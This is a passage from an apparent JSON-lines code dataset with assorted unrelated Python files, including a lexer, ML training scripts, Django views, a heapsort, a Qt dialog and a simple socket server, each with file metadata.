= word.lower()\n count[word] += title.count(word)\n after = data.get(\"after\")\n if after is not None:\n return count_words(subreddit, word_list, after, count)\n result = []\n for k in count.keys():\n if count[k] != 0:\n if result == []:\n result.append(\"{}: {}\".format(k, count[k]))\n else:\n for i in range(len(result)):\n if count[k] > int(result[i].split(' ')[1]):\n result = result[:i] + \\\n [\"{}: {}\".format(k, count[k])] + \\\n result[i:]\n break\n elif count[k] == int(result[i].split(' ')[1]):\n alpha_list = [k, result[i].split(' ')[0]]\n j = 1\n if (i + j) >= len(result):\n continue\n while count[k] == int(result[i + j].split(' ')[1]):\n alpha_list.append(result[i + j].split(' ')[0])\n alpha_list = alpha_list.sort\n for j in range(len(alpha_list)):\n if k == alpha_list[j]:\n result = result[:i + j] + \\\n [\"{}: {}\".format(k, count[k])] + \\\n result[i + j:]\n else:\n continue\n else:\n result.append(\"{}: {}\".format(k, count[k]))\n if result != []:\n for printing in result:\n print(printing)\n","sub_path":"0x13-count_it/0-count.py","file_name":"0-count.py","file_ext":"py","file_size_in_byte":2974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"442221471","text":"from typing import List, Dict\n\nfrom Src.BioAnalyzer.Analysis.GenePrioritization.Steps.DifferentialAnalysis.Analyzers.GlobalDifferentialAnalyzerBase import \\\n GlobalDifferentialAnalyzerBase\nfrom Src.BioAnalyzer.Analysis.GenePrioritization.Steps.DifferentialAnalysis.Measurers.GlobalRsemNormalizedCountMeasurer import \\\n GlobalRsemNormalizedCountMeasurer\nfrom Src.BioAnalyzer.CrossCutting.DTOs.GenePrioritization.GlobalDifferentialSampleDto import GlobalDifferentialSampleDto\nfrom Src.BioAnalyzer.Managers.GenePrioritization.GlobalDifferentialMessengerRnaSampleManager import \\\n GlobalDifferentialMessengerRnaSampleManager\nfrom Src.BioDataManagement.CrossCutting.DTOs.GeneExpressionLevelDto import GeneExpressionLevelDto\nfrom Src.Core.Entity.ProcessInfo import ProcessInfo\nfrom Src.Core.Entity.Status import Status\n\n\nclass GlobalMessengerRnaDifferentialAnalyzer(GlobalDifferentialAnalyzerBase[int, GeneExpressionLevelDto]):\n \"\"\"description of class\"\"\"\n def __init__(self):\n \"\"\"\n \"\"\"\n self.__manager = GlobalDifferentialMessengerRnaSampleManager()\n self.__measurer = GlobalRsemNormalizedCountMeasurer()\n\n def execute(self, values: Dict[int, List[GeneExpressionLevelDto]]) -> ProcessInfo:\n \"\"\"\n \n :param values: \n :return: \n \"\"\"\n diff_analysis_info = None\n\n try:\n diff_sample = GlobalDifferentialSampleDto(\n values=[self.__measurer.calculate(id_entrez,\n [l.case_value for l in levels],\n [l.control_value for l in levels])\n for id_entrez, levels in values.items()])\n\n except:\n diff_analysis_info = ProcessInfo(status=Status.Fail,\n message='Global differential analysis for messenger RNA samples has failed. See details to more information.',\n details=['{0}. {1}'.format(Status.Fail.name,\n 'Error in calculating the global differential analysis in the messenger RNA samples.')])\n\n if diff_analysis_info:\n return diff_analysis_info\n\n try:\n self.__manager.add_one(diff_sample)\n diff_analysis_info = ProcessInfo(status=Status.OK,\n message='Global differential analysis for messenger RNA samples has been successful. See details to more information.',\n details=['{0}. 
{1}'.format(Status.OK.name,\n 'Global differential analysis for messenger RNA samples has executed and saved in the system.')])\n\n except:\n diff_analysis_info = ProcessInfo(status=Status.Fail,\n message='Global differential analysis for messenger RNA samples has failed. See details to more information.',\n details=['{0}. {1}'.format(Status.Fail.name,\n 'Error in saving the global differential analysis for messenger RNA samples in the system.')])\n\n return diff_analysis_info","sub_path":"Src/BioAnalyzer/Analysis/GenePrioritization/Steps/DifferentialAnalysis/Analyzers/GlobalMessengerRnaDifferentialAnalyzer.py","file_name":"GlobalMessengerRnaDifferentialAnalyzer.py","file_ext":"py","file_size_in_byte":3407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"354773872","text":"\nfrom aganlab.databases import connect_strs, getDatabaseAPIs\n\nfrom aganlab.databases.local_nlp import Doc2VecModelReference\nfrom aganlab.databases.remote_stock import RecoCom\n\nfrom aganlab.sim_stocks.testing import most_similar, usable_stock\n\nimport datetime\n\nimport logging\nlogger = logging.getLogger(__name__)\n\ndef redirector(result):\n container = { 'all': [], 'A股': [], '三板股':[] }\n for code, _, _, market, _ in result:\n container['all'].append(code)\n container[market].append(code)\n for index, ls in container.items():\n container[index] = ','.join(ls)\n reco_all = container['all']\n reco_ashare = container['A股']\n reco_oc = container['三板股']\n return reco_all, reco_ashare, reco_oc\n\ndef __main__(doc2vec_id):\n _, _, sess_scope_local_nlp = getDatabaseAPIs(connect_strs['local_nlp'])\n _, _, sess_scope_remote_a = getDatabaseAPIs(connect_strs['remote_a_shares'])\n _, _, sess_scope_stock = getDatabaseAPIs(connect_strs['remote_stock'])\n\n with sess_scope_local_nlp() as sess_local_nlp, sess_scope_remote_a() as sess_remote_a, sess_scope_stock() as sess_stock:\n doc2vec = sess_local_nlp.query(Doc2VecModelReference).filter_by(id_=doc2vec_id).first().load_model()\n # all_codes = [\n # code for code in doc2vec.docvecs.doctags.keys()\n # if code not in existed\n # ]\n all_codes = doc2vec.docvecs.doctags.keys()\n for code in all_codes:\n result = most_similar(sess_remote_a, sess_local_nlp, doc2vec, code, fast_mode=True)\n reco_all, reco_ashare, reco_oc = redirector(result)\n reco_com = RecoCom(\n code = code,\n reco_codes_all = reco_all,\n reco_codes_neeq = reco_oc,\n reco_codes_astock = reco_ashare,\n update_time = datetime.datetime.now()\n )\n\n sess_stock.merge(reco_com)\n sess_stock.commit()\n","sub_path":"sim_stocks/writing.py","file_name":"writing.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"268227681","text":"import ply.lex as lex\n\n\ntokens = (\n\t'INTEGER',\n\t'STRING',\n\t'PLUS',\n\t'MINUS',\n\t'TIMES',\n\t'DIVIDE',\n\t'MODULO',\n\t'LPAREN',\n\t'RPAREN',\n)\n\n\nt_PLUS = r'\\+'\nt_MINUS = r'-'\nt_TIMES = r'\\*'\nt_DIVIDE = r'/'\nt_MODULO = r'%'\nt_LPAREN = r'\\('\nt_RPAREN = r'\\)'\n\nt_ignore = ' \\t\\n\\r'\n\ndef t_INTEGER(t):\n\tr'0|[1-9]\\d*'\n\tt.value = int(t.value)\n\treturn t\n\ndef t_STRING(t):\n\tr\"'(\\.|[^'])*'\"\n\tt.value = str(t.value[1:-1])\n\treturn t\n\ndef t_error(t):\n\tprint('illegal token: \"{}\"'.format(t.value[0]))\n\nlex.lex()\n\n\n","sub_path":"lexer.py","file_name":"lexer.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} 
+{"seq_id":"11038976","text":"# Configuration file for ipython.\nc = get_config()\n\n#------------------------------------------------------------------------------\n# TerminalInteractiveShell(InteractiveShell) configuration\n#------------------------------------------------------------------------------\n\n## Set to confirm when you try to exit IPython with an EOF (Control-D in Unix,\n# Control-Z/Enter in Windows). By typing 'exit' or 'quit', you can force a\n# direct exit without any confirmation.\nc.TerminalInteractiveShell.confirm_exit = False\n\n## Shortcut style to use at the prompt. 'vi' or 'emacs'.\nc.TerminalInteractiveShell.editing_mode = 'vi'\n\n## Set the color scheme (NoColor, Neutral, Linux, or LightBG).\nc.InteractiveShell.colors = 'Neutral'\n\n## Use 24bit colors instead of 256 colors in prompt highlighting. If your\n# terminal supports true color, the following command should print 'TRUECOLOR'\n# in orange: printf \"\\x1b[38;2;255;100;0mTRUECOLOR\\x1b[0m\\n\"\nc.TerminalInteractiveShell.true_color = True\n","sub_path":"python/.ipython/profile_default/ipython_config.py","file_name":"ipython_config.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"58193997","text":"#工具准备\r\nimport os\r\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\r\nimport tensorflow as tf\r\nfrom sklearn.preprocessing import scale\r\nimport numpy as np\r\n\r\n#函数准备\r\ndef model(w, x, b):\r\n return x @ w + b\r\n\r\ndef loss(x, y, w, b):\r\n err = y - model(w, x, b)\r\n return tf.reduce_mean(tf.square(err))\r\n\r\ndef gard(x, y, w, b):\r\n with tf.GradientTape() as tape:\r\n loss_ = loss(x, y, w, b)\r\n return tape.gradient(loss_, [w, b])\r\n\r\n#数据准备\r\nbuston = tf.keras.datasets.boston_housing\r\n(x_train, y_train), (x_test, y_test) = buston.load_data()\r\nx_train, x_test = tf.cast(scale(x_train), tf.float32), tf.cast(scale(x_test), tf.float32)\r\n\r\n#模型准备\r\nw = tf.Variable(tf.random.normal([13, 1], mean=0, stddev=1.), dtype=tf.float32)\r\nb = tf.Variable(tf.zeros(1), dtype=tf.float32)\r\ntrain_epochs = 50\r\nlearning_rate = 0.001\r\nbatch_size = 10\r\noptimizer = tf.keras.optimizers.SGD(learning_rate)\r\n\r\n#模型训练\r\nfor epoch in range(train_epochs):\r\n for step in range(int(len(x_train) / batch_size)):\r\n xs = x_train[step * batch_size:(step + 1) * batch_size]\r\n ys = y_train[step * batch_size:(step + 1) * batch_size]\r\n\r\n gards = gard(xs, ys, w, b)\r\n optimizer.apply_gradients(zip(gards, [w, b]))\r\n\r\n train_loss = loss(x_train, y_train, w, b) # 当前轮次总的损失\r\n print(\"epoch:{:3d},train_loss:{:.4f}\".format(epoch, train_loss))\r\n#训练结果\r\nprint('w:',w.numpy().transpose(), '\\nb:', b.numpy())\r\nnp.random.seed(int(np.random.rand()*1000))\r\nhouse_id = np.random.randint(0, len(x_test))\r\nprint('testNum',len(x_test))\r\npre = model(w, x_test, b)[house_id]\r\nprint(\"第{}条数据,预测值:{:.4f},实际值:{}\".format(house_id, pre[0], y_test[house_id]))","sub_path":"第七周作业/boston.py","file_name":"boston.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"274072828","text":"import sklearn.svm\r\nimport numpy\r\nimport argparse\r\n\r\n\r\ndef parse_file(file):\r\n\tf = open(file, 'r+')\r\n\tsamples = [(line[-1] == '\\n' and line[:-1] or line).decode('utf-8').split('\\t') for line in f if line[0] != '#']\r\n\tfeatures = [[int(feature) for feature in sample[1:]] for sample in samples]\r\n\tclasses = [(sample[0] == u\"male\" and 1 
or -1) for sample in samples]\r\n\treturn features, classes\r\n\r\n\t\r\ndef get_features(files):\r\n\tfeatures = []\r\n\tclasses = []\r\n\tfor file in files:\r\n\t\tfile_features, file_classes = parse_file(file)\r\n\t\tfeatures.extend(file_features)\r\n\t\tclasses.extend(file_classes)\r\n\treturn features, classes\r\n\t\r\n\t\r\ndef parse_args():\r\n\tparser = argparse.ArgumentParser(description = 'SVM friends gender predictor')\r\n\tparser.add_argument('input_files', metavar='IN', type=str, nargs='+', help='input files to use')\r\n\treturn parser.parse_args()\r\n\r\n\t\t\r\nclass GenderPredictor(object):\r\n\t\r\n\tdef __init__(self):\r\n\t\tself.clf = sklearn.svm.SVC()\r\n\t\t\r\n\tdef fit(self, features, classes):\r\n\t\tself.clf.fit(features, classes)\r\n\t\t\r\n\tdef predict(self, features):\r\n\t\treturn self.clf.predict(features).tolist()\r\n\t\t\r\n\tdef test(self, predictions, classes):\r\n\t\tprint(\"Predicted classes:\")\r\n\t\tprint(predictions)\r\n\t\tprint(\"Real classes:\")\r\n\t\tprint(classes)\r\n\t\tsucceed = len([prediction for prediction, clas in zip(predictions, classes) if prediction == clas])\r\n\t\ttotal = len(classes)\r\n\t\taccuracy = 1.0 * succeed / total * 100\r\n\t\tprint(\"Accuracy: \"\t+ str(succeed) + \" succeed of \" + str(total) + \" total (\" + str(accuracy) + \"%)\")\r\n\t\treturn accuracy\r\n\r\n\tdef split_for_testing(self, features, classes):\r\n\t\tprint (len(classes))\r\n\t\ttests = len(classes) / 4\r\n\t\treturn ({\"features\":features[tests:], \"classes\":classes[tests:]},\r\n\t\t\t\t{\"features\":features[:tests], \"classes\":classes[:tests]})\r\n\r\ndef main():\r\n\targs = parse_args()\r\n\tfeatures, classes = get_features(args.input_files)\r\n\tmodel = GenderPredictor()\r\n\ttrainers, testers = model.split_for_testing(features, classes)\r\n\tmodel.fit(trainers[\"features\"], trainers[\"classes\"])\r\n\tpredictions = model.predict(testers[\"features\"])\r\n\tmodel.test(predictions, testers[\"classes\"])\r\n\t\r\n\r\nif __name__ == \"__main__\":\r\n\tmain()\r\n","sub_path":"fb_svm/svm.py","file_name":"svm.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"362936507","text":"#Time:O(m+n)\r\n#Space:O(m+n) for m vertices and n edges\r\nclass Solution:\r\n def findJudge(self, n: int, trust: List[List[int]]) -> int:\r\n indegree = [0]*(n+1)\r\n outdegree = [0]*(n+1)\r\n for out_val,in_val in trust:\r\n indegree[in_val]+=1\r\n outdegree[out_val]+=1\r\n for i in range(1,n+1):\r\n if indegree[i]==n-1:\r\n if outdegree[i]==0:\r\n return i\r\n return -1","sub_path":"Town_Judge.py","file_name":"Town_Judge.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"316742786","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nfrom matplotlib import gridspec\nimport matplotlib.ticker as mtick\n\n\ndef grids():\n \"\"\"Applies aesthetic gridding to a subplot axis.\"\"\"\n\n ax.minorticks_on()\n ax.tick_params('y', length=8, which='major', labelsize='10')\n ax.tick_params('y', length=3, which='minor')\n ax.tick_params('x', which='both', bottom=False, top=False)\n ax.set_axisbelow(True)\n ax.grid(True, which='major', ls='-', lw=.5, alpha=0.75, zorder=0, color='lightgray')\n ax.grid(True, which='minor', ls=':', alpha=.15, zorder=0, color='lightgray')\n\n\ndef spines():\n for spine in ax.spines.values():\n spine.set_visible(False)\n\n\ndef ticks():\n 
ax.tick_params(which='both', top=False, left=False, right=False, bottom=False)\n\n\ndef set_gridspec(widths, heights, wspace=0, hspace=0):\n fig = plt.figure(figsize=(sum(widths) + wspace * (len(widths) - 1),\n sum(heights) + hspace * (len(heights) - 1)))\n gs = gridspec.GridSpec(len(heights), len(widths),\n height_ratios=heights, width_ratios=widths)\n return fig, gs\n\n\ndef getPayrollData(year, job_title):\n df = pd.read_csv(f\"payroll data/santa-cruz-{year}.csv\")\n df_stats = df.loc[df['Job Title'].str.lower()==job_title.lower()].describe()\n return df_stats\n\npayroll_years = range(2011, 2019)\npayroll_data = {year: getPayrollData(year, 'Police Officer') for year in payroll_years}\n\n\n# Initializing figure.\nfig, gs = set_gridspec(widths=[15], heights=[7, 1, 7])\n\n# First figure\nax = fig.add_subplot(gs[0])\ngrids(); spines()\nax.set_facecolor('ghostwhite')","sub_path":"police_payroll.py","file_name":"police_payroll.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"321498311","text":"from PyQt5.QtWidgets import QDialog, QTreeWidget, QTreeWidgetItem, QLineEdit, QVBoxLayout, QPushButton, QHBoxLayout, QStyle\n\nfrom utils.ViewUtils import FilterTreeBySearchText\n\nclass LogicSelectDialog(QDialog):\n def __init__(self, logicsModel):\n super().__init__()\n\n self._resultLogic = None\n self._currentSelection = None\n\n self._rootLayout = QVBoxLayout()\n\n self._searchLine = QLineEdit()\n self._searchLine.setPlaceholderText(\"Search...\")\n self._searchLine.setClearButtonEnabled(True)\n self._searchLine.textChanged.connect(self._signal_searchLine_textChanged)\n self._rootLayout.addWidget(self._searchLine)\n\n self._tree = QTreeWidget()\n self._tree.setHeaderHidden(True)\n self._tree.setColumnCount(1)\n self._tree.setSortingEnabled(False)\n self._tree.currentItemChanged.connect(self._signal_tree_currentItemChanged)\n self._buildTree(self._tree.invisibleRootItem(), logicsModel.getLogics())\n self._rootLayout.addWidget(self._tree)\n\n self._buttotLayout = QHBoxLayout()\n\n self._cancelBt = QPushButton(\"Cancel\")\n self._cancelBt.clicked.connect(self._signal_cancelBt_clicked)\n self._buttotLayout.addWidget(self._cancelBt)\n\n self._addBt = QPushButton(\"Add\")\n self._addBt.clicked.connect(self._signal_addBt_clicked)\n self._addBt.setEnabled(False)\n self._buttotLayout.addWidget(self._addBt)\n\n self._rootLayout.addLayout(self._buttotLayout)\n\n self.setLayout(self._rootLayout)\n self.setWindowTitle(\"Select Entity Logic\")\n\n def _buildTree(self, rootItem, moduleLogics):\n for module in moduleLogics:\n moduleItem = QTreeWidgetItem(rootItem)\n moduleItem.setText(0, module.getName())\n moduleItem.setIcon(0, self.style().standardIcon(QStyle.SP_DirIcon))\n for logic in module.getLogics():\n item = QTreeWidgetItem(moduleItem)\n item.setText(0, logic.getName())\n item._node = logic\n\n def _signal_cancelBt_clicked(self):\n self._resultLogic = None\n self.done(0)\n\n def _signal_addBt_clicked(self):\n self._resultLogic = self._currentSelection\n self.done(0)\n\n def _signal_searchLine_textChanged(self, text):\n FilterTreeBySearchText(self._tree, text)\n\n def getResultLogic(self):\n return self._resultLogic\n\n def _signal_tree_currentItemChanged(self, currItem, prevItem):\n if currItem is not None:\n if hasattr(currItem, \"_node\"):\n self._currentSelection = currItem._node\n self._addBt.setEnabled(True)\n return\n self._currentSelection = None\n 
self._addBt.setEnabled(False)","sub_path":"Sources/Editor/App/dialog/LogicSelecDialog.py","file_name":"LogicSelecDialog.py","file_ext":"py","file_size_in_byte":2766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"308769753","text":"# Initialization.py\n# Copyright (c) 2018 PDFix. All Rights Reserved.\n\n## \n# \\page Python_Samples Python Samples\n# -\\subpage Initialization_py \n# \\page Initialization_py Initialization Sample\n# Example how to initialize PDFix SDK in python.\n# \\snippet /Initialization.py Initialization_py\n#\n\n##\n#\\cond INTERNAL\n#! [Initialization_py]\nimport sys, os\nimport Utils\nfrom Pdfix import *\n\ndef Initialization(email, key):\n print('Pdfix Initialization Sample')\n\n pdfix = GetPdfix()\n if pdfix is None:\n raise Exception('Pdfix Initialization fail')\n\n # check version\n major = pdfix.GetVersionMajor()\n minor = pdfix.GetVersionMinor()\n patch = pdfix.GetVersionPatch()\n print(\"PDFix SDK Version \" + str(major) + \".\" + str(minor) + \".\" + str(patch))\n\n # authorization\n if not pdfix.Authorize(email, key):\n raise Exception('Authorization fail : ' + pdfix.GetError())\n\n # some code to execute\n\n # cleanup\n pdfix.Destroy()\n\ntry:\n # pdfix initialization\n email = Utils.getEmail() # email address\n licenseKey = Utils.getLicenseKey() # license key\n cwd = os.getcwd() + \"/\" # current working directory\n\n # pdfix initialization\n Pdfix_init(cwd + Utils.getModuleName('pdfix'))\n\n Initialization(email, licenseKey)\n\n Pdfix_destroy()\n\nexcept Exception as e:\n print('Oops! ' + str(e))\n\n## \n#! [Initialization_py]\n# \\endcond\n","sub_path":"public/Initialization.py","file_name":"Initialization.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"432266898","text":"# coding=utf-8\nfrom django import forms\nfrom django_summernote.widgets import SummernoteWidget\nfrom .models import Article\n\n\nclass ArticleForm(forms.ModelForm):\n class Meta:\n model = Article\n fields = [\n \"title\",\n \"image\",\n \"content\",\n \"draft\",\n \"publish\",\n ]\n widgets = {\n \"content\": SummernoteWidget(),\n }\n\n\nclass SearchForm(forms.Form):\n q = forms.CharField(max_length=100, label='Búsqueda')\n","sub_path":"articles/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"604299585","text":"import numpy as np\nfrom scipy import linalg\n\nEPSILON = 1e-6\n\nclass WorldDiffusionSystem(object):\n def __init__(self, patch_map, linear_solver):\n self.patch_map = patch_map\n self.compound_total_amount = np.sum(patch_map.compute_repartition_vector())\n self.solver = linear_solver\n\n def __str__(self):\n return \"#\"*5+\" WORLD DIFFUSION SYSTEM \"+\"#\"*5+\"\\n\"+\\\n \"Solver: {}\\n\".format(self.solver)+\\\n str(self.patch_map)\n\n def compute_new_repartition(self, compound_total_amount, production_vector):\n C = self.patch_map.compute_speed_matrix()\n C_inversed = self.patch_map.compute_inverted_speed_matrix()\n\n M = np.matmul(self.patch_map.links_matrix, C)\n P = production_vector\n\n X_0 = self.solver.solve(np.matmul(M,M), -np.matmul(M,P))\n\n # Find *non-zero* solution to MY = 0\n M_eigenvalues, M_eigenvectors = np.linalg.eig(M)\n M_eigenpairs = [(value, M_eigenvectors[:,i]) for i, value in enumerate(M_eigenvalues)]\n Y_0 = [vector for (value, vector) in M_eigenpairs if abs(value) 
< EPSILON][0]\n\n\n lambda_value = (compound_total_amount - np.sum(X_0))/np.sum(Y_0)\n new_repartition = X_0 + lambda_value * Y_0\n\n return new_repartition\n\n def update_production(self, new_production_vector):\n self.patch_map.update_production(new_production_vector)\n\n def make_step(self, time_elapsed):\n production_vector = self.patch_map.compute_production_vector()\n\n compound_total_production = np.sum(production_vector)\n initial_compound_amount = np.sum(self.patch_map.compute_repartition_vector())\n compound_total_amount = initial_compound_amount + time_elapsed * compound_total_production\n\n new_repartition = self.compute_new_repartition(compound_total_amount, production_vector)\n\n for i, patch in enumerate(self.patch_map.patches):\n patch.compound_amount = new_repartition[i]\n","sub_path":"World_Compound_Diffusion_Model/world_diffusion_system.py","file_name":"world_diffusion_system.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"510885505","text":"import io\nimport sys\n\ndef heapify(arr, n, i):\n root = i\n l = 2*i+1\n r = 2*i+2\n if l < n and arr[i] < arr[l]:\n root = l\n if r < n and arr[root] < arr[r]:\n root = r\n if root != i:\n arr[i],arr[root] = arr[root],arr[i]\n heapify(arr, n, root)\n\ndef heapSort(arr):\n n = len(arr)\n for i in range(n, -1, -1):\n heapify(arr, n, i)\n for i in range(n-1, 0, -1):\n arr[i], arr[0] = arr[0], arr[i]\n heapify(arr, i, 0)\n\n\ndef main():\n inp = sys.stdin\n out = sys.stdout\n n = inp.readline()\n a = inp.readline().split('\\n')[0].split(' ')\n arr = []\n for i in a:\n arr.append(int(i))\n heapSort(arr)\n print(\"{}\".format(arr))\n\nif __name__==\"__main__\":\n main()","sub_path":"Q1/heapSort.py","file_name":"heapSort.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"156104490","text":"import json\nimport ssl\nimport requests\n\nfrom django.conf import settings\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\n\ncontext = ssl._create_unverified_context()\n\n@api_view()\n@permission_classes((IsAuthenticated,))\ndef evaluate_calories(request):\n profile = request.user.profile\n data = {\n \"query\": request.query_params.get('query'),\n \"gender\": 'male',\n \"weight_kg\": profile.weight / 2.205,\n \"height_cm\": profile.height,\n \"age\": profile.age\n }\n\n if request.query_params.get('query') is not None:\n a = prepare_nutritionix_request('/natural/exercise', data)\n obj = json.loads(a.text)\n\n total_calories = 0\n exercises = []\n for exercise in obj['exercises']:\n total_calories += exercise['nf_calories']\n exercises.append(exercise['name'])\n return Response({\n 'calories': total_calories,\n 'exercises': exercises\n })\n\n return Response({})\n\n\n@api_view()\n@permission_classes((IsAuthenticated,))\ndef evaluate_nutrients(request):\n data = {\n \"query\": request.query_params.get('query'),\n \"timezone\": \"PDT\"\n }\n\n if request.query_params.get('query') is not None:\n a = prepare_nutritionix_request('/natural/nutrients', data)\n obj = json.loads(a.text)\n\n total_calories, total_fat, total_carb, total_protein = 0, 0, 0, 0\n ingredients = []\n for ingredient in obj['foods']:\n total_calories += ingredient['nf_calories']\n total_carb += ingredient['nf_total_carbohydrate']\n total_fat += 
ingredient['nf_total_fat']\n total_protein += ingredient['nf_protein']\n\n ingredients.append({\n \"name\": ingredient['food_name'],\n \"quantity\": ingredient['serving_qty'],\n \"protein\": ingredient['nf_protein'],\n \"carb\": ingredient['nf_total_carbohydrate'],\n \"fat\": ingredient['nf_total_fat'],\n \"calories\": ingredient['nf_calories']\n })\n return Response({\n 'calories': total_calories,\n 'fat': total_fat,\n 'carb': total_carb,\n 'protein': total_protein,\n 'foods': ingredients\n })\n\n return Response({})\n\n\ndef prepare_nutritionix_request(url, data=None):\n headers = {\n 'x-app-id': settings.NUTRIONIX_APP_ID,\n 'x-app-key': settings.NUTRIONIX_APP_KEY,\n 'x-remote-user-id': settings.NUTRIONIX_USER_ID,\n 'x-user-jwt': settings.NUTRIONIX_TOKEN\n }\n\n if data is not None:\n r = requests.post(settings.NUTRIONIX_URL + url, data, headers=headers)\n else:\n r = requests.get(settings.NUTRIONIX_URL + url, headers=headers)\n return r\n\n\ndef is_connected(response):\n return True","sub_path":"global_api/functions_view.py","file_name":"functions_view.py","file_ext":"py","file_size_in_byte":2924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"321618283","text":"import socket\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsock.bind(('10.11.112.137', 666))\n\nwhile True:\n\n sock.listen(5)\n clientsocket, address = sock.accept()\n print(f'New connection from {address} has been established')\n clientsocket.send(b'Welcome to the server')\n clientsocket.close()\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"474779662","text":"import logging\n\ntry:\n import torch\n from transformers import AutoModelForSeq2SeqLM, AutoTokenizer\nexcept ImportError:\n # No installation required if not using this function\n pass\n\nfrom nlpaug.model.lang_models import LanguageModels\n\nimport nlpaug.util.text.tokenizer as text_tokenizer\n\n\nclass T5(LanguageModels):\n # https://arxiv.org/pdf/1910.10683.pdf\n\n def __init__(self, model_path='t5-base', min_length=10, max_length=20, num_beam=3, no_repeat_ngram_size=3, \n device='cuda', silence=True):\n super().__init__(device, temperature=None, top_k=None, top_p=None, silence=True)\n try:\n import transformers\n except ModuleNotFoundError:\n raise ModuleNotFoundError('Missed transformers library. Install transfomers by `pip install transformers`')\n\n self.model_path = model_path\n self.min_length = min_length\n self.max_length = max_length\n self.num_beam = num_beam\n self.no_repeat_ngram_size = no_repeat_ngram_size\n\n self.tokenizer = AutoTokenizer.from_pretrained(model_path)\n if silence:\n # Transformers thrown an warning regrading to weight initialization. It is expected\n orig_log_level = logging.getLogger('transformers.' + 'modeling_utils').getEffectiveLevel()\n logging.getLogger('transformers.' + 'modeling_utils').setLevel(logging.ERROR)\n self.model = AutoModelForSeq2SeqLM.from_pretrained(model_path)\n logging.getLogger('transformers.' 
+ 'modeling_utils').setLevel(orig_log_level)\n\n self.model.to(self.device)\n self.model.eval()\n\n self.text_prefix = 'summarize: '\n self.return_tensor = 'pt' # PyTorch\n self.early_stopping = True\n self.skip_special_token = True\n self.default_max_length_ratio = 0.5\n\n def predict(self, text, n=1):\n # Convert to feature\n token_ids = self.tokenizer.encode(self.text_prefix + text, return_tensors=self.return_tensor)\n\n # Prediction\n min_length = self.get_min_length(text)\n max_length = self.get_max_length(text)\n target_token_ids = self.model.generate(token_ids,\n min_length=min_length, max_length=max_length, num_beams=self.num_beam,\n no_repeat_ngram_size=self.no_repeat_ngram_size)\n\n tokens = self.tokenizer.decode(target_token_ids[0], skip_special_tokens=self.skip_special_token)\n\n # Return full sentence only.\n for i in range(len(tokens)-1, -1, -1):\n if tokens[i] in text_tokenizer.SENTENCE_SEPARATOR:\n return tokens[:i+1]\n\n return tokens\n\n def get_min_length(self, text):\n return int(len(text) * self.min_length) if self.min_length < 1 else self.min_length\n\n def get_max_length(self, text):\n if self.max_length < 1:\n return int(len(text) * self.max_length)\n else:\n if len(text) >= self.max_length:\n return int(len(text) * self.default_max_length_ratio)\n else:\n return self.max_length\n","sub_path":"nlpaug/model/lang_models/t5.py","file_name":"t5.py","file_ext":"py","file_size_in_byte":3052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"532102261","text":"from django.http import HttpResponse\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext,loader,Context\nimport Query\nimport Constant\nimport dummydata\nfrom gaesessions import get_current_session\nimport logging\nfrom google.appengine.ext import ndb\ndef get_not_recently_loggedin(request):\n session = get_current_session()\n teacherkey = session.get('teacherkey',-1)\n notrecentlydict =Query.get_students_not_logged_in_by_class(teacherkey)\n logging.error('sbxjks' )\n logging.error(notrecentlydict)\n t = loader.get_template('Dashboard/not_recently_logged_in_all')\n c = Context({'notrecentlylogin': notrecentlydict,})\n return HttpResponse(t.render(c),content_type=\"text/xml\")\n\n\ndef mastery_by_student_by_class(request):\n session = get_current_session()\n teacherkey = session.get('teacherkey',-1)\n mastery_by_student = Query.get_mastery_by_student_of_class(teacherkey)\n\n t = loader.get_template('Dashboard/teacher_mastery_by_student')\n c = Context({'mastery_by_student':mastery_by_student ,})\n return HttpResponse(t.render(c),content_type=\"text/xml\")\n\ndef get_not_recently_loggedin_all(request):\n session = get_current_session()\n teacherkey = session.get('teacherkey',-1)\n notrecentlyloggedin = Query.get_students_not_logged_in_of_all_class(teacherkey)\n logging.error(notrecentlyloggedin)\n t = loader.get_template('Dashboard/not_recently_logged_in_all')\n c = Context({'notrecentlyloginall': notrecentlyloggedin,})\n return 